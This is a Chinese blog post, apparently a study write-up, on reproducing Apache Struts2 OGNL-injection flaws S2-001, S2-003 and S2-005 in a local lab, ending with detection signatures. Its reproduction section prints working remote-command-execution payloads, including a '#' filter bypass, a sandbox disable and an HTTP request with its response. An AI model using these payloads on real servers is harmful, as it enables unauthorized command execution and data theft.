<!DOCTYPE html>



  


<html class="theme-next gemini use-motion" lang="zh-CN">
<head>
  <meta charset="UTF-8"/>
<meta http-equiv="X-UA-Compatible" content="IE=edge" />
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1"/>
<meta name="theme-color" content="#222">


  
  
    
    
  <script src="/lib/pace/pace.min.js?v=1.0.2"></script>
  <link href="/lib/pace/pace-theme-minimal.min.css?v=1.0.2" rel="stylesheet">







<meta http-equiv="Cache-Control" content="no-transform" />
<meta http-equiv="Cache-Control" content="no-siteapp" />
















  
  
  <link href="/lib/fancybox/source/jquery.fancybox.css?v=2.1.5" rel="stylesheet" type="text/css" />







<link href="/lib/font-awesome/css/font-awesome.min.css?v=4.6.2" rel="stylesheet" type="text/css" />

<link href="/css/main.css?v=5.1.4" rel="stylesheet" type="text/css" />


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png?v=5.1.4">


  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png?v=5.1.4">


  <link rel="mask-icon" href="/images/logo.svg?v=5.1.4" color="#222">





  <meta name="keywords" content="Hexo, NexT" />










<meta name="description" content="前言知识ognl表达式注入对象导航图语言，用于访问对象的字段、方法。基于简化访问java对象属性和调用方法需求，实现字段类型转化等功能；访问列表的元素：peoplelist[0] 1234&#x2F;&#x2F;正常java代码String name &#x3D; MyUser.getName()&#x2F;&#x2F;表达式写法#MyUser.name  对静态方法或变量的访问 java：类名.方法名 ognl：@类名@方法名  思考：后端">
<meta property="og:type" content="article">
<meta property="og:title" content="struts2框架漏洞">
<meta property="og:url" content="https://flowers-boy.top/posts/48203.html">
<meta property="og:site_name" content="关根">
<meta property="og:description" content="前言知识ognl表达式注入对象导航图语言，用于访问对象的字段、方法。基于简化访问java对象属性和调用方法需求，实现字段类型转化等功能；访问列表的元素：peoplelist[0] 1234&#x2F;&#x2F;正常java代码String name &#x3D; MyUser.getName()&#x2F;&#x2F;表达式写法#MyUser.name  对静态方法或变量的访问 java：类名.方法名 ognl：@类名@方法名  思考：后端">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616221736840-1006422143.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616221521627-691059725.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616223223048-1053557580.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616224654112-1086478625.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616224906599-1489159828.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616225503869-755811821.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616231743715-604972521.png">
<meta property="og:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616231712456-1645109332.png">
<meta property="article:published_time" content="2024-06-14T07:45:27.000Z">
<meta property="article:modified_time" content="2024-06-16T15:21:09.273Z">
<meta property="article:author" content="关根">
<meta property="article:tag" content="关键词">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616221736840-1006422143.png">



<script type="text/javascript" id="hexo.configurations">
  var NexT = window.NexT || {};
  var CONFIG = {
    root: '',
    scheme: 'Gemini',
    version: '5.1.4',
    sidebar: {"position":"left","display":"post","offset":12,"b2t":true,"scrollpercent":false,"onmobile":false},
    fancybox: true,
    tabs: true,
    motion: {"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"slideDownIn","post_body":"slideDownIn","coll_header":"slideLeftIn","sidebar":"slideUpIn"}},
    duoshuo: {
      userId: '0',
      author: 'Author'
    },
    algolia: {
      applicationID: '',
      apiKey: '',
      indexName: '',
      hits: {"per_page":10},
      labels: {"input_placeholder":"Search for Posts","hits_empty":"We didn't find any results for the search: ${query}","hits_stats":"${hits} results found in ${time} ms"}
    }
  };
</script>



  <link rel="canonical" href="https://flowers-boy.top/posts/48203.html"/>





  <title>struts2框架漏洞 | 关根</title>
  








<meta name="generator" content="Hexo 7.2.0"></head>

<body itemscope itemtype="http://schema.org/WebPage" lang="zh-CN">

  
  
    
  

  <div class="container sidebar-position-left page-post-detail">
    <div class="headband"></div>

    <header id="header" class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-wrapper">
  <div class="site-meta ">
    

    <div class="custom-logo-site-title">
      <a href="/"  class="brand" rel="start">
        <span class="logo-line-before"><i></i></span>
        <span class="site-title">关根</span>
        <span class="logo-line-after"><i></i></span>
      </a>
    </div>
      
        <p class="site-subtitle">爱具体的人 做具体的事</p>
      
  </div>

  <div class="site-nav-toggle">
    <button>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
      <span class="btn-bar"></span>
    </button>
  </div>
</div>

<nav class="site-nav">
  

  
    <ul id="menu" class="menu">
      
        
        <li class="menu-item menu-item-首页">
          <a href="/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-home"></i> <br />
            
            首页
          </a>
        </li>
      
        
        <li class="menu-item menu-item-关于我">
          <a href="/about/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-user"></i> <br />
            
            关于我
          </a>
        </li>
      
        
        <li class="menu-item menu-item-分类">
          <a href="/categories/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-th"></i> <br />
            
            分类
          </a>
        </li>
      
        
        <li class="menu-item menu-item-归档">
          <a href="/archives/" rel="section">
            
              <i class="menu-item-icon fa fa-fw fa-archive"></i> <br />
            
            归档
          </a>
        </li>
      

      
    </ul>
  

  
</nav>



 </div>
    </header>

    <main id="main" class="main">
      <div class="main-inner">
        <div class="content-wrap">
          <div id="content" class="content">
            

  <div id="posts" class="posts-expand">
    

  

  
  
  

  <article class="post post-type-normal" itemscope itemtype="http://schema.org/Article">
  
  
  
  <div class="post-block">
    <link itemprop="mainEntityOfPage" href="https://flowers-boy.top/posts/48203.html">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="name" content="">
      <meta itemprop="description" content="">
      <meta itemprop="image" content="/images/avatar.png">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="关根">
    </span>

    
      <header class="post-header">

        
        
          <h1 class="post-title" itemprop="name headline">struts2框架漏洞</h1>
        

        <div class="post-meta">
          <span class="post-time">
            
              <span class="post-meta-item-icon">
                <i class="fa fa-calendar-o"></i>
              </span>
              
                <span class="post-meta-item-text">Posted on</span>
              
              <time title="Post created" itemprop="dateCreated datePublished" datetime="2024-06-14T15:45:27+08:00">
                2024-06-14
              </time>
            

            

            
          </span>

          
            <span class="post-category" >
            
              <span class="post-meta-divider">|</span>
            
              <span class="post-meta-item-icon">
                <i class="fa fa-folder-o"></i>
              </span>
              
                <span class="post-meta-item-text">In</span>
              
              
                <span itemprop="about" itemscope itemtype="http://schema.org/Thing">
                  <a href="/categories/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/" itemprop="url" rel="index">
                    <span itemprop="name">漏洞复现</span>
                  </a>
                </span>

                
                
              
            </span>
          

          
            
          

          
          

          
            <span class="post-meta-divider">|</span>
            <span class="page-pv">本文总阅读量
            <span class="busuanzi-value" id="busuanzi_value_page_pv" ></span>次
            </span>
          

          

          

        </div>
      </header>
    

    
    
    
    <div class="post-body" itemprop="articleBody">

      
      

      
        <meta name="referrer" content="no-referrer">

<h2 id="前言知识"><a href="#前言知识" class="headerlink" title="前言知识"></a>前言知识</h2><h3 id="ognl表达式注入"><a href="#ognl表达式注入" class="headerlink" title="ognl表达式注入"></a>ognl表达式注入</h3><p>对象导航图语言，用于访问对象的字段、方法。基于简化访问java对象属性和调用方法需求，实现字段类型转化等功能；访问列表的元素：peoplelist[0]</p>
<figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">//正常java代码</span></span><br><span class="line"><span class="type">String</span> <span class="variable">name</span> <span class="operator">=</span> MyUser.getName()</span><br><span class="line"><span class="comment">//表达式写法</span></span><br><span class="line">#MyUser.name</span><br></pre></td></tr></table></figure>

<h4 id="对静态方法或变量的访问"><a href="#对静态方法或变量的访问" class="headerlink" title="对静态方法或变量的访问"></a>对静态方法或变量的访问</h4><ul>
<li>java：类名.方法名</li>
<li>ognl：@类名@方法名</li>
</ul>
<h4 id="思考："><a href="#思考：" class="headerlink" title="思考："></a>思考：</h4><p>后端写了一段程序：使用了ognl这个功能，getValue值可控，用户传入恶意表达式，导致漏洞</p>
<p>%{value}将表达式值转换为字符串格式，在数据库查询参数的动态构造中非常有用</p>
<h3 id="Runtime"><a href="#Runtime" class="headerlink" title="Runtime"></a>Runtime</h3><h4 id="作用域"><a href="#作用域" class="headerlink" title="作用域"></a>作用域</h4><p>在java中，方法的<strong>作用域</strong>指的是方法<strong>可以被访问的范围</strong>。</p>
<ol>
<li>Public：公共方法，可以被任何类访问</li>
<li>Protected：受保护方法，可以被同一包内的类和该类的子类访问</li>
<li>Default（package-private）：默认方法，只能被同一包内的类访问</li>
<li>Private：私有方法，只能在定义该方法的类内部访问</li>
</ol>
<h4 id="使用Runtime时"><a href="#使用Runtime时" class="headerlink" title="使用Runtime时"></a>使用Runtime时</h4><p>为啥不用通过 new 这种形式来创建对象</p>
<p>Runtime的类构造方法定义域时private–&gt;导致无法new一个新的对象出来</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616221736840-1006422143.png" alt="image-20240616221741744"></p>
<p>那怎样获取Runtime的对象？<br><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616221521627-691059725.png" alt="image-20240616221526053"></p>
<h4 id="静态方法"><a href="#静态方法" class="headerlink" title="静态方法"></a>静态方法</h4><p>在java中，static关键字用于表示一个成员属于类本身，而不是某个对象</p>
<ul>
<li>无需创建类的实例即可被调用，可使用类名+方法名调用，例如ClassName.methodName()</li>
<li>非静态成员依赖于对象实例；静态方法不依赖任何实例</li>
</ul>
<h4 id="如何去执行"><a href="#如何去执行" class="headerlink" title="如何去执行"></a>如何去执行</h4><figure class="highlight java"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">private</span> <span class="keyword">static</span> <span class="type">Runtime</span> <span class="variable">currentRuntime</span> <span class="operator">=</span> <span class="keyword">new</span> <span class="title class_">Runtime</span>();</span><br><span class="line"><span class="keyword">public</span> <span class="keyword">static</span> Runtime <span class="title function_">getRuntime</span><span class="params">()</span> &#123;</span><br><span class="line">    <span class="keyword">return</span> currentRuntime;</span><br><span class="line">&#125;</span><br><span class="line">定义currentRuntime的私有静态变量，初始化为一个新的Runtime对象。然后，它提供了一个公共静态方法getRuntime()，该方法返回currentRuntime变量的值。</span><br></pre></td></tr></table></figure>

<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616223223048-1053557580.png" alt="image-20240616223228152"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">new Runtime(); 不能用</span><br><span class="line"></span><br><span class="line">Runtime.getRuntime(); 获取到Runtime对象</span><br></pre></td></tr></table></figure>

<h2 id="漏洞原理"><a href="#漏洞原理" class="headerlink" title="漏洞原理"></a>漏洞原理</h2><p>用户提交表单数据并验证失败时，后端会将用户之前提交的参数值使用ognl表达式%{value}进行解析，然后重新填充到对应的表单数据中。</p>
<p>例如注册或登录页面，提交失败后端一般会默认返回之前提交的数据，由于后端使用 %{value} 对提交的数据执行了一次 OGNL 表达式解析，所以可以直接构造 Payload 进行命令执行</p>
<h2 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>漏洞复现</h2><h3 id="S2-001"><a href="#S2-001" class="headerlink" title="S2-001"></a>S2-001</h3><p>poc：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//获取tomcat执行路径</span><br><span class="line">%&#123;&quot;tomcatBinDir&#123;&quot;+@java.lang.System@getProperty(&quot;user.dir&quot;)+&quot;&#125;&quot;&#125;</span><br><span class="line"></span><br><span class="line">/usr/local/tomcat</span><br></pre></td></tr></table></figure>

<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616224654112-1086478625.png" alt="image-20240616224658534"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//获取web路径</span><br><span class="line">%&#123;#req=@org.apache.struts2.ServletActionContext@getRequest(),#response=#context.get(&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;).getWriter(),#response.println(#req.getRealPath(&#x27;/&#x27;)),#response.flush(),#response.close()&#125;</span><br><span class="line"></span><br><span class="line">/usr/local/tomcat/webapps/ROOT/ </span><br></pre></td></tr></table></figure>

<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616224906599-1489159828.png" alt="image-20240616224911469"></p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">//执行任意命令</span><br><span class="line">new java.lang.String[]&#123;&quot;cat&quot;,&quot;/etc/passwd&quot;&#125;</span><br><span class="line"></span><br><span class="line">%&#123;#a=(new java.lang.ProcessBuilder(new java.lang.String[]&#123;&quot;whoami&quot;&#125;)).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(&quot;com.opensymphony.xwork2.dispatcher.HttpServletResponse&quot;),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()&#125;</span><br></pre></td></tr></table></figure>

<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616225503869-755811821.png" alt="image-20240616225506526"></p>
<h3 id="S2-003"><a href="#S2-003" class="headerlink" title="S2-003"></a>S2-003</h3><p>ognl表达式通过#来访问struts的对象，struts框架通过过滤#字符防止安全问题，通过unicode编码（u2003）或8进制即可绕过安全限制，从而操纵服务器端上下文对象</p>
<p>公布的poc</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line">GET /s2_war/index.action?(%27\u0023context[\%27xwork.MethodAccessor.denyMethodExecution\%27]\u003dfalse%27)(bla)(bla)&amp;(%27\u0023_memberAccess.excludeProperties\u003d@java.util.Collections@EMPTY_SET%27)(kxlzx)(kxlzx)&amp;(%27\u0023mycmd\u003d\%27id\%27%27)(bla)(bla)&amp;(%27\u0023myret\u003d@java.lang.Runtime@getRuntime().exec(\u0023mycmd)%27)(bla)(bla)&amp;(A)((%27\u0023mydat\u003dnew\40java.io.DataInputStream(\u0023myret.getInputStream())%27)(bla))&amp;(B)((%27\u0023myres\u003dnew\40byte[51020]%27)(bla))&amp;(C)((%27\u0023mydat.readFully(\u0023myres)%27)(bla))&amp;(D)((%27\u0023mystr\u003dnew\40java.lang.String(\u0023myres)%27)(bla))&amp;(%27\u0023myout\u003d@org.apache.struts2.ServletActionContext@getResponse()%27)(bla)(bla)&amp;(E)((%27\u0023myout.getWriter().println(\u0023mystr)%27)(bla)) HTTP/1.1</span><br><span class="line">Host: 127.0.0.1:8080</span><br><span class="line">Upgrade-Insecure-Requests: 1</span><br><span class="line">User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_13_1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/71.0.3578.98 Safari/537.36</span><br><span class="line">Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8</span><br><span class="line">Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,pt;q=0.7,da;q=0.6</span><br><span class="line">Cookie: JSESSIONID=FC7DC2221FDB37EAE855C6E6A11E9CC1; _ga=GA1.1.267931382.1545202285</span><br><span class="line">Connection: close</span><br></pre></td></tr></table></figure>

<p>请求响应内容：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line">HTTP/1.1 200 OK</span><br><span class="line">Server: Apache-Coyote/1.1</span><br><span class="line">Date: Mon, 24 Dec 2018 09:36:01 GMT</span><br><span class="line">Connection: close</span><br><span class="line"></span><br><span class="line">uid=1234556(xxxx) gid=1603212982 groups=1603212982....</span><br></pre></td></tr></table></figure>

<h3 id="S3-005"><a href="#S3-005" class="headerlink" title="S3-005"></a>S3-005</h3><p>XWork会将GET参数的键和值利用OGNL表达式解析成Java语句，如：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br></pre></td><td class="code"><pre><span class="line">user.address.city=Bishkek&amp;user[&#x27;favoriteDrink&#x27;]=kumys </span><br><span class="line">//会被转化成</span><br><span class="line">action.getUser().getAddress().setCity(&quot;Bishkek&quot;)  </span><br><span class="line">action.getUser().setFavoriteDrink(&quot;kumys&quot;)</span><br></pre></td></tr></table></figure>

<p>触发漏洞就是利用了这个点，再配合OGNL的沙盒绕过方法，组成了S2-003。官方对003的修复方法是增加了安全模式（沙盒），S2-005在OGNL表达式中将安全模式关闭，又绕过了修复方法。整体过程如下：</p>
<ul>
<li><p>S2-003 使用<code>\u0023</code>绕过s2对<code>#</code>的防御</p>
</li>
<li><p>S2-003后官方增加了安全模式（沙盒）</p>
</li>
<li><p>S2-005使用ognl表达式将沙盒关闭，继续使用代码</p>
</li>
</ul>
<p>poc（无回显，空格用@代替）：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/example/HelloWorld.action?(%27%5cu0023_memberAccess[%5c%27allowStaticMethodAccess%5c%27]%27)(vaaa)=true&amp;(aaaa)((%27%5cu0023context[%5c%27xwork.MethodAccessor.denyMethodExecution%5c%27]%5cu003d%5cu0023vccc%27)(%5cu0023vccc%5cu003dnew%20java.lang.Boolean(%22false%22)))&amp;(asdf)((&#x27;%5cu0023rt.exec(%22touch@/tmp/success%22.split(%22@%22))&#x27;)(%5cu0023rt%5cu003d@java.lang.Runtime@getRuntime()))=1</span><br></pre></td></tr></table></figure>

<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616231743715-604972521.png" alt="image-20240616231748445"></p>
<p>进入容器可以看到&#x2F;tmp下创建了success文件</p>
<p><img src="https://img2023.cnblogs.com/blog/3373819/202406/3373819-20240616231712456-1645109332.png" alt="image-20240616231717266"></p>
<h1 id="struts2攻击特征有哪些"><a href="#struts2攻击特征有哪些" class="headerlink" title="struts2攻击特征有哪些"></a>struts2攻击特征有哪些</h1><p><strong>RCE试图传⼊的命令以及执⾏结果</strong> </p>
<p><strong>参数伪造，试图传⼊OGNL表达式</strong></p>
<h1 id="struts2的特征"><a href="#struts2的特征" class="headerlink" title="struts2的特征"></a>struts2的特征</h1><p><strong>.do .action后缀常会出现，.jsp也可能</strong></p>
<p><strong>能够处理OGNL表达式</strong></p>

      
    </div>
    
    
    

    

    

    

    <footer class="post-footer">
      

      
      
      

      
        <div class="post-nav">
          <div class="post-nav-next post-nav-item">
            
              <a href="/posts/4e75e90a.html" rel="next" title="护网蓝队面试">
                <i class="fa fa-chevron-left"></i> 护网蓝队面试
              </a>
            
          </div>

          <span class="post-nav-divider"></span>

          <div class="post-nav-prev post-nav-item">
            
              <a href="/posts/33360.html" rel="prev" title="Log4j2远程代码执行漏洞">
                Log4j2远程代码执行漏洞 <i class="fa fa-chevron-right"></i>
              </a>
            
          </div>
        </div>
      

      
      
    </footer>
  </div>
  
  
  
  </article>



    <div class="post-spread">
      
    </div>
  </div>


          </div>
          


          

  



        </div>
        
          
  
  <div class="sidebar-toggle">
    <div class="sidebar-toggle-line-wrap">
      <span class="sidebar-toggle-line sidebar-toggle-line-first"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-middle"></span>
      <span class="sidebar-toggle-line sidebar-toggle-line-last"></span>
    </div>
  </div>

  <aside id="sidebar" class="sidebar">
    
    <div class="sidebar-inner">

      

      
        <ul class="sidebar-nav motion-element">
          <li class="sidebar-nav-toc sidebar-nav-active" data-target="post-toc-wrap">
            Table of Contents
          </li>
          <li class="sidebar-nav-overview" data-target="site-overview-wrap">
            Overview
          </li>
        </ul>
      

      <section class="site-overview-wrap sidebar-panel">
        <div class="site-overview">
          <div class="site-author motion-element" itemprop="author" itemscope itemtype="http://schema.org/Person">
            
              <img class="site-author-image" itemprop="image"
                src="/images/avatar.png"
                alt="" />
            
              <p class="site-author-name" itemprop="name"></p>
              <p class="site-description motion-element" itemprop="description"></p>
          </div>

          <nav class="site-state motion-element">

            
              <div class="site-state-item site-state-posts">
              
                <a href="/archives">
              
                  <span class="site-state-item-count">12</span>
                  <span class="site-state-item-name">posts</span>
                </a>
              </div>
            

            
              
              
              <div class="site-state-item site-state-categories">
                <a href="/categories/index.html">
                  <span class="site-state-item-count">5</span>
                  <span class="site-state-item-name">categories</span>
                </a>
              </div>
            

            

          </nav>

          

          
            <div class="links-of-author motion-element">
                
                  <span class="links-of-author-item">
                    <a href="https://github.com/lu-fe1" target="_blank" title="GitHub">
                      
                        <i class="fa fa-fw fa-github"></i>GitHub</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="mailto:2186533588@qq.com" target="_blank" title="E-Mail">
                      
                        <i class="fa fa-fw fa-envelope"></i>E-Mail</a>
                  </span>
                
                  <span class="links-of-author-item">
                    <a href="https://blog.csdn.net/2301_82000839?spm=1000.2115.3001.5343" target="_blank" title="CSDN">
                      
                        <i class="fa fa-fw fa-CSDN"></i>CSDN</a>
                  </span>
                
            </div>
          

          
          

          
          

          

        </div>
      </section>

      
      <!--noindex-->
        <section class="post-toc-wrap motion-element sidebar-panel sidebar-panel-active">
          <div class="post-toc">

            
              
            

            
              <div class="post-toc-content"><ol class="nav"><li class="nav-item nav-level-2"><a class="nav-link" href="#%E5%89%8D%E8%A8%80%E7%9F%A5%E8%AF%86"><span class="nav-number">1.</span> <span class="nav-text">前言知识</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#ognl%E8%A1%A8%E8%BE%BE%E5%BC%8F%E6%B3%A8%E5%85%A5"><span class="nav-number">1.1.</span> <span class="nav-text">ognl表达式注入</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%AF%B9%E9%9D%99%E6%80%81%E6%96%B9%E6%B3%95%E6%88%96%E5%8F%98%E9%87%8F%E7%9A%84%E8%AE%BF%E9%97%AE"><span class="nav-number">1.1.1.</span> <span class="nav-text">对静态方法或变量的访问</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E6%80%9D%E8%80%83%EF%BC%9A"><span class="nav-number">1.1.2.</span> <span class="nav-text">思考：</span></a></li></ol></li><li class="nav-item nav-level-3"><a class="nav-link" href="#Runtime"><span class="nav-number">1.2.</span> <span class="nav-text">Runtime</span></a><ol class="nav-child"><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%9C%E7%94%A8%E5%9F%9F"><span class="nav-number">1.2.1.</span> <span class="nav-text">作用域</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E4%BD%BF%E7%94%A8Runtime%E6%97%B6"><span class="nav-number">1.2.2.</span> <span class="nav-text">使用Runtime时</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E9%9D%99%E6%80%81%E6%96%B9%E6%B3%95"><span class="nav-number">1.2.3.</span> <span class="nav-text">静态方法</span></a></li><li class="nav-item nav-level-4"><a class="nav-link" href="#%E5%A6%82%E4%BD%95%E5%8E%BB%E6%89%A7%E8%A1%8C"><span class="nav-number">1.2.4.</span> <span class="nav-text">如何去执行</span></a></li></ol></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%8E%9F%E7%90%86"><span class="nav-number">2.</span> <span class="nav-text">漏洞原理</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0"><span class="nav-number">3.</span> <span class="nav-text">漏洞复现</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#S2-001"><span class="nav-number">3.1.</span> <span class="nav-text">S2-001</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#S2-003"><span class="nav-number">3.2.</span> <span class="nav-text">S2-003</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#S3-005"><span class="nav-number">3.3.</span> <span class="nav-text">S3-005</span></a></li></ol></li></ol></li><li class="nav-item nav-level-1"><a class="nav-link" href="#struts2%E6%94%BB%E5%87%BB%E7%89%B9%E5%BE%81%E6%9C%89%E5%93%AA%E4%BA%9B"><span class="nav-number"></span> <span class="nav-text">struts2攻击特征有哪些</span></a></li><li class="nav-item nav-level-1"><a class="nav-link" href="#struts2%E7%9A%84%E7%89%B9%E5%BE%81"><span class="nav-number"></span> <span class="nav-text">struts2的特征</span></a></div>
            

          </div>
        </section>
      <!--/noindex-->
      

      
        <div class="back-to-top">
          <i class="fa fa-arrow-up"></i>
          
        </div>
      

    </div>
  </aside>


        
      </div>
    </main>

    <footer id="footer" class="footer">
      <div class="footer-inner">
        <div class="copyright">&copy; <span itemprop="copyrightYear">2024</span>
  <span class="with-love">
    <i class="fa fa-user"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">关根</span>

  
</div>
<!--

  <div class="powered-by">Powered by <a class="theme-link" target="_blank" href="https://hexo.io">Hexo</a></div>



  <span class="post-meta-divider">|</span>



  <div class="theme-info">Theme &mdash; <a class="theme-link" target="_blank" href="https://github.com/iissnan/hexo-theme-next">NexT.Gemini</a> v5.1.4</div>

-->


        
<div class="busuanzi-count">
  <script async src="https://busuanzi.ibruce.info/busuanzi/2.3/busuanzi.pure.mini.js"></script>

  
    <span class="site-uv">
      <i class="fa fa-user"></i>本站总访客数
      <span class="busuanzi-value" id="busuanzi_value_site_uv"></span>
      人次
    </span>
  

  
    <span class="site-pv">
      <i class="fa fa-eye"></i>本站总访问量
      <span class="busuanzi-value" id="busuanzi_value_site_pv"></span>
      次
    </span>
  
</div>








        
      </div>
    </footer>

    

    

  </div>

  

<script type="text/javascript">
  if (Object.prototype.toString.call(window.Promise) !== '[object Function]') {
    window.Promise = null;
  }
</script>









  












  
  
    <script type="text/javascript" src="/lib/jquery/index.js?v=2.1.3"></script>
  

  
  
    <script type="text/javascript" src="/lib/fastclick/lib/fastclick.min.js?v=1.0.6"></script>
  

  
  
    <script type="text/javascript" src="/lib/jquery_lazyload/jquery.lazyload.js?v=1.9.7"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>
  

  
  
    <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>
  


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.4"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.4"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.4"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.4"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.4"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.4"></script>



  


  




	





  





  












  





  

  

  
<script>
(function(){
    var bp = document.createElement('script');
    var curProtocol = window.location.protocol.split(':')[0];
    if (curProtocol === 'https') {
        bp.src = 'https://zz.bdstatic.com/linksubmit/push.js';        
    }
    else {
        bp.src = 'http://push.zhanzhang.baidu.com/push.js';
    }
    var s = document.getElementsByTagName("script")[0];
    s.parentNode.insertBefore(bp, s);
})();
</script>


  
  

  

  

  

</body>
</html>
